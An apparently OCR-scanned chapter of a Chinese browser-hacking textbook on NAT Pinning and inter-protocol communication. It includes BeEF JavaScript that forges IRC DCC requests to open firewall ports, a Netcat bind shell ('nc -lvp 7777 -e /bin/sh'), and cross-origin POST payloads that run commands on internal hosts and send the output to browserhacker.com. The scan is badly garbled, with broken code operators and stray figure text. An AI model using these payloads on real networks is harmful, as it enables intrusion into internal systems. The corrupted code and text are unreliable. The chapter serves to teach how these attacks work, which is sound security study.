a 在 22 端 口 提供 SSH 服 务 的 系统 IP: 192.168.0.4 
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我 们 知道 ， 端 口 封禁 机 制 会 阻止 直接 连接 22 端 口 。 换 句 话说， 即使 你 能 发 现 它 ， 也 不 能 使 用 
HTTP 协 议 连 接 它 。 就 算 能 够 连接 ,也 不 能 跨 域 读 取 响应 。 使 用 NAT Pinning， 可 以 实现 NAT 穿 越 ， 
告诉 路 由 器 你 想 让 192.168.0.70:22 能 从 外 部 〈 互 联网 ) 访问 。 如 果 能 做 到 这 一 点 ， 就 可 以 轻松 地 
从 外 部 连 到 内 网 目标 系统 的 22 端 口 。 而 在 能 直接 通过 SSH 访 问 该 服务 器 之 后 ， 就 可 以 使 用 THC 
Hydra^ 等 工具 对 其 开始 字典 或 暴力 破解 攻击 。 

这 种 攻击 的 一 个 先决 条 件 ,就 是 路 由 器 必须 支持 连接 跟踪 以 实现 NAT 穿 越 ， 而 且 路 由 需 应 该 
允许 出 站 流量 。 幸 运 的 是 ， 很 多 SOHO 路 由 需 都 会 这 样 配置 。 

IRC NAT Pinning 

Kamkar 在 DEF CON 18 上 演示 NAT Pinning 的 时 候 ， 使 用 了 一 台 Belkin N1 Vision Wireless 路 由 
器 。 他 使 用 了 IRC 协 议 穿 透 路 由 器 的 NAT。 德 国 FDS 团 队 关 于 这 一 技术 的 研究 表明 ， 到 2013 年 1 
月 ， 每 个 基于 OpenWRT 的 路 由 器 在 默认 配置 下 都 存在 此 漏洞 ”。 

假设 你 想 利 用 的 路 由 器 在 iptables 中 有 如 下 针对 防火 墙 的 配置 : 


# DEF 

OUTIF=eth0 
LANIF-ethl 
LAN-192.168.0.0/24 
































# MODULE 

modprobe ip conntrack 
modprobe ip conntrack ftp 
modprobe iptable nat 


# 清理 

iptables --flush 

iptables --table nat --flush 
iptables --delete-chain 

iptables --table nat --delete-chain 


# ARLE 


echo 1 > /proc/sys/net/ipv4/ip forward 


# 不 限 流量 
iptables -A INPUT -i lo -j ACCEPT 
iptables -A OUTPUT -o lo -j ACCEPT 


# 默认 策略 

iptables --policy INPUT DROP 
iptables --policy OUTPUT DROP 
iptables --policy FORWARD DROP 





# 之 前 初始 化 和 接受 的 

# 绕 过 规则 检查 

# 不 限 出 站 流量 

iptables -A OUTPUT -m state --state 
NEW, ESTABLISHED, RELATED -j ACCEPT 
iptables -A INPUT -m state --state 
ESTABLISHED, RELATED -j ACCEPT 
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# 放 开 LAN 的 入 站 流量 
iptables -A INPUT -i $LANIF -j ACCEPT 


# NAT 
PRET T 
iptables -t nat -A POSTROUTING -o SOUTIF -j MASQUERADE 


# 初始 化 和 接受 的 WAN 到 LAN 通 信 
iptables --append FORWARD -m state --state 
ESTABLISHED, RELATED -i SOUTIF -o SLANIF -j ACCEPT 





# 不 限 LAN 到 WAN 的 出 站 通信 
iptables --append FORWARD -m state --state 
NEW, ESTABLISHED,RELATED -o SOUTIF -i SLANIF -j ACCEPT 


iptables -A INPUT -j LOG --log-level debug 
iptables -A INPUT -j DROP 

iptables -A FORWARD -j LOG --log-level debug 
iptables -A FORWARD -j DROP 


以 上 防火 墙 和 NAT 配 置 符合 实现 NAT Pinning 的 要 求 。 这 是 因为 负责 连接 跟踪 的 模块 已 经 
启用 了 ， 而 且 也 人 允许 从 LAN 到 WAN 接 口 的 出 站 流量 。 在 前 一 节 讨 论 的 例子 中 ， 我 们 攻击 的 意 
图 是 允许 从 WAN 接 口 到 内 网 192.168.0.70 上 的 入 站 连接 。 以 下 JavaScript 代 码 演示 了 如 何 发 起 这 
个 攻击 : 








var privateip = '192.168.0.70'; 
var privateport = '22'; 
var connectto = 'browserhacker.com'; 


function dot2dec(dot) { 
var d = dot.split('.'); 
return (((+d[0])*256+(+d[1]) )*256+(+d[2]) )*256+(+d[3]); 


var mylframe = beef.dom.createInvisibleIframe(); 
var myForm = document.createElement ("form"); 


var action = "http://" + connectto + ":6667/" 
myForm.setAttribute("name", "data"); 
myForm.setAttribute("method", "post"); 


( 
( 
myForm.setAttribute("enctype", "multipart/form-data"); 
myForm.setAttribute("action", action); 


/ /创建 DCC 消 息 

x = String.fromCharCode(1); 

var message = 'PRIVMSG beef :'+x+'DCC CHAT beef '-« 
dot2dec(privateip)+' '+privateport+x+"\n"; 


/7/ 创 建 消息 文本 区 域 

var myExt = document.createElement ("textarea"); 
myExt.setAttribute("id","msg 1"); 
myExt.setAttribute("name","msg 1"); 
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myForm.appendChild (myExt); 
myIframe.contentWindow.document.body.appendaChild (myForm); 


// 发 送 消息 

myIframe.contentWindow.document.getElementById( 
"msg 1").value - message; 

myForm.submit(); 


执行 这 段 JavaScript 代 码 后 ,浏览 器 会 连接 http://browserhacker.com:6667/。Firefox 和 IE 都 不 会 
封禁 这 个 默认 的 IRC 端 口 。 而 browserhacker.com 服 务 器 监听 在 TCP 端 口 6667 上 ， 套 接 字 服 务 可 以 
是 Ruby 的 TCPServer， 也 可 以 是 Netcat 等 更 简单 的 服务 。 不 管 是 什么 ， 监 听 服 务 都 不 必 非 得 是 真 
正 的 有 耻 C 实 现 ， 因 为 其 功能 只 有 接收 数据 。 

发 到 该 端口 的 数据 是 PRIVMSG beef MDCC CHAT beef 323223559022\lwm。 其 中 的 DCC 
( Direct Client-to-Client ) 是 一 个 IRC 方 法 ， 用 于 初始 化 两 个 用 户 之 间 的 直 连 ， 通 过 它 可 以 传 文件 ， 
也 可 以 私 聊 ”。3232235590 是 十 进 制 形式 的 IP 地 址 192.168.0.70, 是 通过 dot2dec () 函数 转换 来 的 。 
你 可 能 会 问 ， 浏 览 器 明明 提交 的 是 一 个 HTTP 的 POST 请 求 ， 怎 么 会 变 成 IRC 命 令 了 呢 ” 这 个 过 程 
会 在 本 章 下 一 小 节 中 详细 介绍 , 现在 就 假设 我 们 可 以 向 非 HTTP 服 务 发 送 HTTP 请 求 , 而 且 它 们 的 
请 求 体 也 可 以 被 正确 解析 。 

这 里 的 关键 在 于 ， 当 路 由 器 的 防火 墙 发 现 外 出 流量 并 读 取 IRC 数 据 时 ， 它 会 认为 用 户 在 请 求 
一 个 DCC 连 接 。 如 果真 是 一 个 合法 的 DCC 请 求 ， 那 就 会 请 求 browserhacker.com 直 接连 接 到 
192.168.0.70。 由 于 路 由 器 的 防火 墙 会 屏蔽 所 有 到 来 的 连接 ， 所 以 它 需 要 把 定向 到 22 端 口 的 
browserhackercom 的 流量 转发 到 192.168.0.70:22。 

此 外 , 看 看 Linux 代 码 库 中 Netfilter 的 nf conntrack irc.c 的 源 代码 ， 就 会 明白 为 什么 能 够 这 样 
了 。 相 关 的 代码 片段 如 下 : 


/* dcc ip can be the internal OR external (NAT'ed) IP */ 
tuple = &ct->tuplehash[dir].tuple; 
if (tuple->src.u3.ip !- dcc ip && 
tuple-»dst.u3.ip !- dcc ip) { 
net warn ratelimited( 
"Forged DCC command from $pI4: $pI4:$uWn", 
&tuple-»src.u3.ip, &dcc ip, dcc port); 
continue; 






















































































} 

以 上 代码 并 没有 按照 注释 中 描述 的 那样 行事 ， 注 释 的 意思 是 DCC IP 可 以 是 内 部 或 外 部 NAT 
之 后 的 人 P 地 址 。 而 外 部 NAT 后 的 IP 地 址 实际 上 不 会 被 检查 ， 而 只 会 验证 目标 IP， 在 这 里 也 就 是 
browserhacker.com。 这 个 bug 为 处 理 多 个 NAT 打 开 了 方便 之 门 。 因 为 它们 都 认定 同一 个 目标 IP, 于 
是 就 可 以 用 一 个 请 求 在 它们 中 触发 NAT Pinning。 

提交 了 伪造 的 DCC 请 求 后 ， 路 由 器 就 会 允许 来 自 browserhacker.com 的 指向 端口 22 的 和 人 站 流 
Eo 这些 流 量 会 被 转发 到 内 部 服务 器 。 于 是 防御 工事 被 破坏 ,外 部 流量 可 以 访问 到 之 前 受 保护 的 
内 部 系统 ， 导 致 IP 访 问 控制 措施 失效 。 

可 以 登录 https://browserhacker.com， 看 看 Bart Leppens 录 制 的 关于 NAT Pinning 的 演示 视频 。 
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Leppens 也 对 利用 NAT Pinning 的 BeEF 相 关 模 块 贡献 过 代码 。 

Eric Leblond 扩 展 了 这 些 攻击 , 从 而 可 以 利用 其 他 协议 ,不 限于 IRC。 他 发 布 了 一 个 叫 opensvp” 
的 工具 ， 用 于 执行 这 些 攻 击 。 这 个 工具 没有 使 用 经 典 的 IRC DCC 方 式 ， 而 是 使 用 FTP 来 动态 打开 
防火 墙 端口 。 注 意 端 口 21 是 被 封禁 的 ， 因 此 不 可 能 通过 浏览 需 实 现 FTP NAT Pinning. 
NAT Pinning 攻 击 很 好 地 说 明了 如 何 创造 性 地 利用 内 网 浏览 右 的 请 求 ， 去 影响 更 多 的 外 部 
系统 。 通 过 伪造 请 求 ， 同 时 欺骗 网 关 防范 机 制 ， 就 可 以 直接 访问 新 目标 ， 为 下 一 步 攻击 做 好 
铺垫 。 



























































10.5.2 ”实现 协议 间 通 信 


2006 年 ，Wade Alcorm 发 表 了 ”关于 IPC 的 研究 成 果 。IPC 的 含义 就 是 两 个 不 同 的 协议 ,无 论 它 
们 的 语法 是 否 相 同 ， 仍 然 可 以 相互 传递 有 价值 的 信息 。 

多 数 情况 下 ，IPC 是 否 成 功 更 多 地 取决 于 开发 者 的 实现 方式 ， 而 非 协议 规范 本 号 。 能 和 否 成 功 
的 条 件 实际 上 相当 简单 。 为 了 实现 两 个 不 同 协议 间 的 通信 ， 必 须 满足 以 下 两 个 条 件 : 
O 目标 协议 实现 中 的 容错 
口 将 目标 协议 数据 封装 到 HTTP 请 求 中 的 能 

在 浏览 器 中 , 这 通常 意味 着 将 一 个 HTTP 请 求 发 送 到 不 使 用 HTTP 协 议 的 监听 服务 。 然 后 ， 该 
服务 能 够 正确 地 解析 该 请 求 或 部 分 请 求 。 

下 面 来 看 一 个 例子 。 这 个 例子 使 用 一 个 虚构 的 协议 , 通过 非常 简单 的 语法 理解 两 个 不 需 认证 
的 命令 。 命 令 如 下 : 

READ <file path> 

WRITE <content> <file path> 


为 了 确认 协议 的 实现 是 否 适合 IPC, 需要 理解 导致 TCP 连 接 中 止 的 条 件 。 如 果 发 送 下 面 的 ( 非 
协议 ) 数据 ， 并 且 连 接 依 然 保 持 活动 ， 就 说 明 该 协议 的 实现 有 利用 价值 : 

ADD foobar 

因为 与 客户 端的 连接 没有 被 重 置 , 所 以 客户 端 可 以 继续 使 用 原来 的 TCP 连 接 发 送 数 据 。 因此 ， 
如 果 客 户 端 发 送 以 下 数据 ， 那 么 错误 的 前 两 行 会 被 丢弃 ， 而 第 三 行 可 能 会 被 解析 并 成 功 执 行 : 

ADD foo 


ADD bar 
WRITE browserhacker.com /opt/protocol/browserhacker 


然后 ， 浏 览 器 IPC 就 可 以 在 此 基础 上 扩展 ， 把 整 条 消息 封装 到 一 个 HTTP POST 请 求 里 。 下 面 
这 个 例子 展示 了 一 个 请 求 ， 它 可 能 会 在 目标 服务 上 执行 一 条 命令 : 

POST / HTTP/1.1 

Host: 192.168.1.130:4444 

User-Agent: Mozilla/5.0 


Content-type: text/plain 
Content-Length: 51 
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WRITE browserhacker.com /opt/protocol/browserhacker 

这 个 HTTP 请 求 的 首部 ， 连 同 CRLF ( 回 车 换行 )， 都 会 被 丢弃 ， 而 请 求 的 最 后 一 行 则 会 被 协 
议 正 确 处理 。 我 们 知道 ， 通 过 POST 请 求 可 以 将 任何 数据 添加 到 请 求 体 中 ， 因 此 就 不 必 在 标准 的 
HTTP 首 部 前 面 添加 字符 串 了 。 正 是 因为 有 了 请 求 体 ， 我 们 才能 控制 与 目标 协议 间 的 通信 。 这 就 
是 IPC ( 涉及 浏览 器 ) 的 核心 工作 原理 。 

另外 ，POST 请 求 的 Content-type 必 须 设 置 成 text/plain 或 multipart/form-data。 这 样 
是 为 了 保证 可 以 像 9.1 节 讨论 的 那样 , 通过 xMLHttpRequest 发 送 跨 域 请 求 (或 通过 HTML 表 单 发 
送 )。 男 外 ， 这 两 种 Content-type 不 限制 你 使 用 的 数据 格式 ， 而 application/x-www-form- 
urlencoded 会 限制 。 假如 使 用 了 application/x-www-form-urlencoded,， 那么 在 请 求 体 中 
必须 使 用 parameter=value 这 种 格式 , 多 余 的 参数 用 x 连 接 。 而 且 编码 某 些 字符 , 比如 空格 字符 ， 
也 可 能 导致 问题 。 而 如 果 使 用 text /plain 或 multipart/form-data， 那 么 在 请 求 体 里 使 用 什 
么 格式 就 完全 看 你 自己 了 ， 比 如 可 以 添加 CR/LF 行 和 空格 。 

有 两 种 方式 可 以 跨 域 发 送 text/plain 或 multipart/form-data 请 求 。 第 一 种 是 动态 创建 
HTML 表 单 ， 然 后 通过 JavaScript 来 提交 该 表单 。BeEF 的 JavaScript API 中 有 一 个 createIframe 
IpecForm() 函数 ， 可 以 帮 你 完成 这 件 寻 

createlframelpecForm: function(rhost, rport, path, commands) { 

// S ERST UPS TE 


// HTML 表 单 会 放 在 这 里 
Var iframelpec = beef.dom.createInvisibleIframe(); 





















































p 


// 创建 HTML 表 单 ， 注 意 enctype 属 性 
var formIpec = document.createElement('form'); 


formIpec.setAttribute('action', ‘http://'+rhost+':'+rport+path) ; 
formIpec.setAttribute('method', 'POST'); 
formIpec.setAttribute('enctype', 'multipart/form-data'); 

// 创建 文本 区 


// 将 POST 主 体 添加 到 文本 区 

input = document.createElement ('textarea'); 
input.setAttribute('name', Math.random().toString(36).substring(5)); 
input.value - commands; 

formIpec.appendChild(input); 
iframelpec.contentWindow.document.body.appendChild(formIpec); 
formIpec.submit(); 


return iframeIpec; 


j 

可 以 像 下 面 这 样 调用 该 方法 : 

beef .dom.createIframeIpecForm(host, port, path, commands); 

注意 ， 多 数 情况 下 都 不 需要 path 人 参数 ， 而 commandqs 人 参数 中 就 是 你 想 通 过 POST 请 求 体 发 送 
的 数据 。 

在 浏览 器 中 实现 IPC 的 第 二 种 方法 是 使 用 XMLHttpRequest 对 象 。 下 面 的 代码 就 是 这 样 一 个 
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例子 : 
var xhr = new XMLHttpRequest (); 
var uri = "http://" + host + ":" + port + "/"; 
xhr.open("POST", uri, true); 
xhr.setRequestHeader("Content-Type", "text/plain"); 
xhr.setRequestHeader('Accept','*/*'); 
xhr.setRequestHeader("Accept-Language", "en"); 


xhr.send(command + "\r\n"); 

变量 command 中 包含 着 你 想 发 送 到 协议 的 数据 ， 后 面 紧 跟 一 个 回 车 和 换行 符 : \z\n。 很 多 
协议 都 接受 这 两 个 字符 ， 将 它们 作为 当前 命令 结束 的 定 界 符 。 

以 上 只 是 浏览 器 与 虚构 协议 实现 IPC 通 信 的 一 个 例子 。 这 里 的 协议 实现 具备 了 允许 此 类 攻击 
的 特点 。 接 下 来 我 们 就 深入 地 探讨 这 些 条 件 。 

1. 协议 的 容错 

IPC 面 临 的 第 一 个 挑战 是 协议 的 实现 是 否 容错 ， 
通信 。 

正如 前 面 例子 中 讨论 的 ， 大 多 数 HTTP 请 求 的 内 容 ， 比 如 首部 ， 会 被 目标 协议 丢弃 。SMTP 
是 一 个 很 好 的 可 以 用 于 教学 的 例子 。 不过， 由 于 它 运行 在 被 封禁 的 端口 上 ,所 以 只 能 局 限于 渗透 
评估 。 

在 UNIX 上 ， 至少 存在 4 种 不 同 的 SMTP 实 现 ， 包 括 Postfix、Sendmail 、Qmail 和 Exim。 在 默认 
配置 下 ，Exim 4.50 在 断 开 客户 端 连接 前 ， 只 允许 出 现 4 个 错误 。 如 此 严格 的 要 求 让 我 们 没 法 对 版 
本 高 于 4.50 的 Exim 发 起 PC， 因 为 来 自 匀 连 浏览 器 的 任何 HTTP 请 求 都 至 少 有 4 个 首部 字段 。 

Postfix 2.7.0 比 Exim 更 不 能 容错 。 它 只 要 检测 到 非 SMTP 命 令 , 就 会 立即 断 开 与 客户 端的 连接 : 


Aug 10 06:38:17 bt postfix/smtpd[3179]: 
connect from browservictim.com[172.16.37.1] 





























通常 决定 了 是 否 能 够 在 浏览 带 中 实现 IPC 











bc 












































Aug 10 06:38:17 bt postfix/smtpd[3179]: 
warning: non-SMTP command from browservictim.com 
[172.16.37.1]: POST / HTTP/T.tT 





Aug 10 06:38:17 bt postfix/smtpd[3179]: 
disconnect from browservictim.com[172.16.37.1] 


虽然 这 些 SMTP 服 务 都 达 不 到 容错 条 件 ， 但 一 些 IMAP 服 务 倒是 可 以 。Eudora IMAP 的 实现 将 
在 后 面 讨论 ， 还 会 讲 一 个 关于 容错 协议 的 例子 。 

验证 了 协议 实现 是 否 能 够 正常 处 理 外 来 数据 之 后 , 接 下 来 就 该 验证 第 二 个 条 件 了 。 那 就 是 协 
议 是 否 能 封装 数据 ， 下 一 小 节 将 会 详细 介绍 。 

2. 数据 封装 

实现 IPC 的 第 二 个 必要 条 件 , 是 目标 协议 可 以 被 封装 在 HTTP 协 议 中 。 尽管 我 们 不 能 去 掉 标 准 
的 HTTP 首 部 ,但 可 以 控制 请 求 的 某 些 内 容 。 利 用 这 一 点 ， 就 可 以 创建 一 些 数据 ， 这 些 数据 会 被 
接收 它 的 服务 认为 是 有 效 的 协议 内 容 。 

基于 ASCII 的 协议 , 像 I[RC 和 LPD， 都 是 比较 简单 的 IPC 协 议 。 其 他 像 RDP 这 样 的 协议 ,使 用 
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的 是 二 进 制 而 非 ASCII， 并 且 一 般 会 在 接收 到 自己 不 理解 的 数据 后 ， 马 上 断 开 与 客户 端的 连接 。 

此 时 ， 通 常 就 没有 必要 再 测试 数据 封装 这 个 条 件 了 ， 因 为 第 一 个 IPC 条 件 〈 容错 ) 就 不 具备 。 
既然 我 们 不 能 使 用 JavaScript 直 接 打开 原始 的 TCP 套 接 字 , 那 就 必须 得 想 办 法 在 当前 层面 解决 

问题 。 这 个 办 法 就 是 使 用 PC 来 实现 与 目标 协议 的 通信 。 更 进一步 ， 在 实现 协议 间 利 用 时 ， 经 常 















































还 会 碰 到 Shellcode， 而 那 通常 又 是 二 进 制 数据 。 可 惜 ， 二 进 制 数据 又 不 是 JavaScript 擅 长 处 理 的 。 
浏 中 原始 的 TCP 套 接 字 的 未 来 








目前 还 没有 办 法 在 浏览 器 里 直接 发 送 原始 的 TCP 数 据 。 然 而 ,这 不 代表 浏览 器 开发 者 没有 
研究 过 这 件 事 。Mozilla WebAPI 团 队 目 前 正在 评估 很 多 新 技术 ， 包 括 TCP Socket API。 关 于 这 
方面 及 其 他 新 特性 的 更 多 信息 ， 可 以 参考 这 个 链接 : https://wiki.mozilla.org/WebAPI。 




















Firefox 增 加 了 通过 sengdAsBinary () 方 法 使 用 XMLHttpReaduest 对 象 发 送 十 进 制 数据 的 支 
持 。 这 个 方法 在 9.10.3 节 中 也 提 到 过 。 
if (!XMLHttpRequest.prototype.sendAsBinary) { 

XMLHttpRequest .prototype.sendAsBinary = function (sData) { 
var nBytes = sData.length, ui8Data = new Uint8Array (nBytes) ; 
for (var nIdx = 0; nIdx < nBytes; nIdx++) ( 

ui8Data[nIdx] - sData.charCodeAt(nIdx) & Oxff; 
} 
/* 视 为 ArrayBufferView... 发 送 : */ 
this.send(ui8Data); 

Jy 

} 


在 写 这 本 书 时 ， 其 他 浏览 器 还 没有 这 个 功能 。 不 过 ， 只 要 支持 类 型 数组 (typed array ) ”， 
就 可 以 在 相应 浏览 器 中 重 写 sengdAsBinary () 的 原型 ,实现 类 似 功能 ， 比 如 在 Chrome 和 Safari 等 
基于 WebKit 的 浏览 器 都 可 以 “。 

3. 协议 间 通 信 的 例子 

接 下 来 将 看 几 个 例子 ,说 明 怎么 利用 不 同 的 协议 来 实现 IPC， 以 及 进一步 实现 IPE 的 可 能 性 。 
本 章 后 面 会 介绍 IPE， 下 面 我 们 只 关注 几 个 IPC 的 例子 。 

(1) 绑 定 shell IPC 的 例子 

试验 IPC 的 一 个 好 方式 ， 就 是 把 一 个 简单 的 监听 服务 绑 定 到 一 个 shell， 也 称 为 绑 定 shell。 如 
果 绑 定 shell 监 听 的 不 是 被 封禁 的 端口 ， 比 如 7777， 就 可 以 在 浏览 器 中 与 其 跨 域 通信 。 这 种 通信 是 
双向 的 ， 既 可 以 发 送 命令 ， 也 可 以 读 取 响 应 。 执 行 下 面 的 代码 ， 可 以 在 POSIX 系 统 中 设置 Netcat 
Sp shell: 


nc -lvp 7777 -e /bin/sh CON 


这 个 命令 在 7777 端 口上 设置 了 监听 服务 , 负责 把 接收 的 数据 发 送 到 /bin/sh 命 令 。 然后 ,就 
可 以 向 这 个 端口 发 送 HTTP 的 POST 请 求 ， 如 果 请 求 体 中 包含 shell 命 令 ， 那 它们 也 会 被 执行 。 对 于 
未 知 的 命令 ，sh 进 程 会 直接 给 出 commangd not found: 
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#foobar 
foobar: command not found 
# 
这 个 行为 非常 适合 IPC， 因 为 虽然 HTTP 首 部 会 被 丢弃 ， 但 其 他 有 效 的 sh 命令 会 被 执行 。 图 


10-12 展 示 了 Netcat 绑 定 shell 在 收 到 跨 域 POST 请 求 后 的 输出 ， 该 请 求 中 包含 commana not found 


和 语法 错误 。 


connect to [172.16.37.153] 
/bin/sh: line 1: Host:: 
syntax error near unexpected token `(' 

“User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; 


/bin/sh: line 2: 
‘bin/sh: line 2: 





这 种 情况 下 ， 通 信和 只 是 单 向 的 ， 而 非 双向 的 。 


tabt:~/Desktop/BeEF-bind-Bart-Linux# nc 





-lvp 7777 -e /bin/sh 


from browservictim.com [172.16.37.1] 57864 
command not found 


rv:23.0) Gecko/20100101 Firefox/23.0 


: No such file or directory 


: line 
: line 
: line 
: line 
: line 
: line 
: line 
: line 
: command not found 
: command not found 


2 
3 
4 
5 
6 
7 
8 
9 


sh: line 12: Content-Disposition:: 


: command not found 
: command not found 
: command not found 


sh: line 16: Content-Disposition:: 


: command not found 
: command not found 
: command not found 


下 一 步 是 想 办 法 接收 命令 的 输出 ， 以 实现 绑 定 shell 与 浏览 器 之 间 的 双向 通信 
力 ， 我 们 可 以 在 输入 shell 的 HTTP 响 应 体 中 加 入 echo 命 令 。 比 如 ， 要 创建 第 


送 以 下 数据 : 


: Accept:: 
: Accept-Language: : 
: Accept-Encoding: : 
: DNT:: command not found 
: Referer: : 
: Connection: : 
: Content-Type: : 
: Content-Length: : 





command not found 


command not found 
command not found 


command not found 

command not found 

command not found 

command not found 
15050309951993538599363372899 

command not found 


15050309951993538599363372899 
command not found 


15050309951993538599363372899- - 


图 10-12 ” 绑 定 shell 中 的 非 双向 通信 























Flo 发 挥 一 点 想象 
一 个 响应 头 ， 可 以 发 


在 Firefox 中 实现 与 绑 定 shell 之 间 双 向 通信 的 代码 ， 可 以 在 browserhacker.com 上 找到 。 
单 起 见 ， 


echo -e HTTP/1.1 200 OK\\\\r; 


然后 可 以 继续 添加 需要 的 其 他 响应 首部 ， 比 如 Content-type 、Content-length， 以 及 命令 结 
这 里 为 了 简 
只 给 出 截取 的 一 小 段 代 码 : 


[ ene 

// &|itipc posix windowlj]34k1E A 

var ipc. posix window = document.createElement ("iframe"); 
[ss 

/ / 通过 Hasbh 标 答 与 父 框架 沟通 命令 执行 结果 





body2 = "__END_OF_POSTX_IPC__</div><s"+"cript>swindow.location='""_ + 
parent + "#ipc_result='+encodeURI(" + 
"document .getElementById(\\\"ipc_content\\\") .innerHTML) ;</" 


-"SCript»«/body»«/html»"; 


Erara] 
// 返回 ijpc_content 内 容 div， 执 行 命令 
// 并 把 命令 结果 返回 给 head -c SIZE 
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"echo \"" + bodyl + "\";(" + cmd + ")|head -c "+size+" ; "); 
poster.appendChild(response) ; 

[...] 

// 等 待 < 超时 > 秒 数 ， 

// 以 让 IFrame url 片 段 匹 配 

function wait() { 


try { 

if (/#ipc_result=/.test (document.getElementById("ipc_posix_window").\ 
contentWindow.location)) ( 

var ipc result = document.getElementById("ipc posix window").wN 
contentWindow.location.href; 

output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+ 
12,ipc result.lastIndexOf(' END OF POSIX IPC  ')); 
[sme] 


这 段 代码 创建 了 一 个 隐藏 的 内 机 框架 ipce_posix_window, 包含 一 个 发 送 POST 请 求 的 HTML 表 
单 。 这 个 内 由 框 架 也 用 于 读 取 编码 后 的 命令 结果 。 结 果 会 被 附加 在 URL 片 段 标 识 符 C) 的 
ipc_result 后 面 ， 类 似 如 下 所 示 : 


http: //browserhacker.com/#ipc_result=%0Atcp%20%20%20%20 
%20%20%320%200%20%320%20%320%20%200%20127.0.0.1:7337%20%20 
%20%20%320%20%320%20%320%200.0.0.0:*%20%20%20%20%320%20%320 
%20%20%20%20320%20%320%20LISTEN%S20%20%20%20%20%201545 
Forss nipas] 

END_OF_POSIX_IPC 


追加 到 内 内 框架 中 的 HTML 表单 包含 两 个 输入 字段 : responsefllendralkBack, RŽ W 
action 属 性 指向 的 目标 是 http:/172.16.37.153:7777/index.html?&y/bin/sh; 。 与 前 面 例子 一 样 ， 使 用 
的 Content-type 是 multipart/form-data (也 可 以 使 用 rext/plain )。 

表单 元 素 的 第 一 个 response 输 入 字段 包含 多 条 echo 命 令 ， 用 于 构建 HTTP 响 应 ,还 有 最 后 
要 执行 的 命令 。 这 里 , 命令 结果 的 前 4096 字 节 会 被 返回 。 如 果 需 要 返回 更 多 内 容 ， 可 以 修改 前 面 
代码 中 的 result_size 变 量 。 

第 二 个 endTalkBack 输 入 字段 包含 分 隔 符 ”END_OF_POSIX_IPC ,命令 结果 的 ipc_ 
contentdiv， 以 及 用 于 将 内 内 框架 地 址 修改 为 父 元 素 地 址 的 一 小 段 脚本 。 父 元 素 地 址 就 是 执行 
当前 JavaScript 代 码 的 页 面 地 址 : 


body2 = " END OF POSIX IPC </div><s"+"cript>window.location='" + 
parent + "#ipc_result='+encodeURI(" + 

"document .getElementById(\\\"ipc_content\\\") . innerHTML) ;</" 
+"script></body></html>"; 


10-13 展 示 了 这 个 POST 请 求 的 原始 主体 ， 从 中 可 以 看 到 这 两 个 输入 字段 以 及 它们 的 值 。 
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可 以 检查 内 骸 框 架 的 地 址 URL 中 是 否 包含 #ipc_result。 执 行 检查 的 是 wait ( 


15050309951993538599363372899 


Content-Disposition: form-data; name-"response" 


echo -e HTTP/1.1 200 OK\\r;echo -e Content-Type: text/html\\r;echo -e Content-Length: 4328\\r;echo -e 
Keep-Alive: timeout=5,max=100\\r;echo -e Connection: keep-alive\\r;echo -e \\r;echo "<html><body><div 


ide'ipc content'»";(netstat -nap | grep 


tcp)|head -c 4096 ; 


15050309951993538599363372899 


Content-Disposition: form-data; name="endTalkBack" 


echo -e " 


..END OF POSIX IPC «/div»«script»window.location-'http://browserhacker.com/fipc result-'*encodeURI 


(document. getElementById(\" ipe_content\").innerHTML) ;</script></body></html> 





图 10-13 ”向 POSIX 绑 定 shell 发 送 netstat 命 令 


返回 的 HTTP 响 应 会 包含 命令 的 结果 和 一 小 段 JavaScript 代 码 ， 用 于 修改 地 址 。 dia 命令 





) PREC, 


检查 内 和 藤 框架 中 是 和 否 返 回 了 有 效 的 响应 。 典 型 的 HTTP 响 应 类 似 一 个 HTTP 页 面 ， 





ECC 
UTER, 





命令 的 结果 保存 在 ipc_content 中 ， 末尾 到 





END OF POSIX IPC 





址 修改 为 browserhacker.com 的 JavaScript 代 码 紧 随 其 后 。 


运行 这 


* POST index.html?&/bin/sh; 200 OK 
Params Headers Post Response HTML Cache 


<html><body><div ids'ipc content'» 
tcp 127.0.0.1:7337 
tcp 0.0.0.0:3306 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp6 
tcp6 
tcp6 
tcp6 


0.0.0.0:5432 
0.0.0.0:25 
172.16.37.153:7777 
22127337 


ooomoooooo 


2 
15432 


172.16.37.153:7777 4.2 KB 172.16.37.1:56955 


LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
LISTEN 
ESTABLISHED 
LISTEN 
LISTEN 
LISTEN 
LISTEN 


1545/postgres.bin 
9924/mysqld 
2136/apache2 
5362/sshd 
1081/postgres 
2815/master 
14404/sh 
1545/postgres.bin 
11298/proftpd: (acc 
5362/sshd 
1081/postgres 


__END_OF_POSIX_IPC__</div><script>window. location='http://browserhacker.com/#ipc_result='+encodeURI (document 
-getElementById("ipc content").innerHTML);«/script»«/body»«/html» 





Ay ire ELE 


图 10-14 命令 结果 返 





返回 到 了 ipc_content 中 


而 把 内 磐 框架 地 


文 段 JavaScript 的 结果 如 图 10-15 所 示 ， 从 中 可 以 清楚 地 看 到 netstat 命 令 的 输出 。 





$ browserhacker.com 





HTML CSS Script DOM Net 


iè Clear Persist Profile (T Errors Warnings 


>>> var target_ip = "172.16.37.153"; var 
target_port...arget_ip, target_port, cmd,result_size); 





9 9 127.0.0.1:7337 
LISTEN 
.bin<br>tcp e 
9.0.0.0:* 
«br»tcp e 
0.0.0.0:* 
«br»tcp e 
@.0.0.0:* 
<br>tcp e 
0.0.0.0:* 
<br>tcp e 
0.0.0.0:* 
«br»tcp 4458 e 
UU 172.16.37.1:56952 
<br>tcp6 e e 
He LISTEN 
1545/postgres .bin<br>tcp6 e e 
3:4 i: 
《acc<br>tcp6 


LISTEN 


LISTEN 


LISTEN 


LISTEN 


LISTEN 


ESTABLISHED 


LISTEN 


11298/proftpd: 
33322 per” LISTEN 


5362/sshd 
2215432 
1081/postgres 


<br>tcp6 
uM LISTEN 
<br> 


Info Debi 





ar target_ip = 7172.16 
target port 


Free pok 
var result size = "4096"; 


// create ipe posix window IPram 
var ipc posix wii 
ipc posix window. 


toElemont("iframe"); 
d',"ipc posix window"); 
ttribute("style", "visibility:hidden;width:lpx;l 


// send a request 
function send commands(ip, port, cmd, size) ( 


var action = "http://" + ip + ":" + port + "/index.html?&/bin/sh;"; 
var parent = window. location.href; 


// create the main form that will be used to send the POST data 


var poster=docunent .createElement ("form"); 


-getElementById(*ipc posix window").contentWindow.document.bc 


bodyl = "<html><body><div ide'ipc content'»"; 
// communicate through the Hash tag to the parent 
// the results of the command execution 
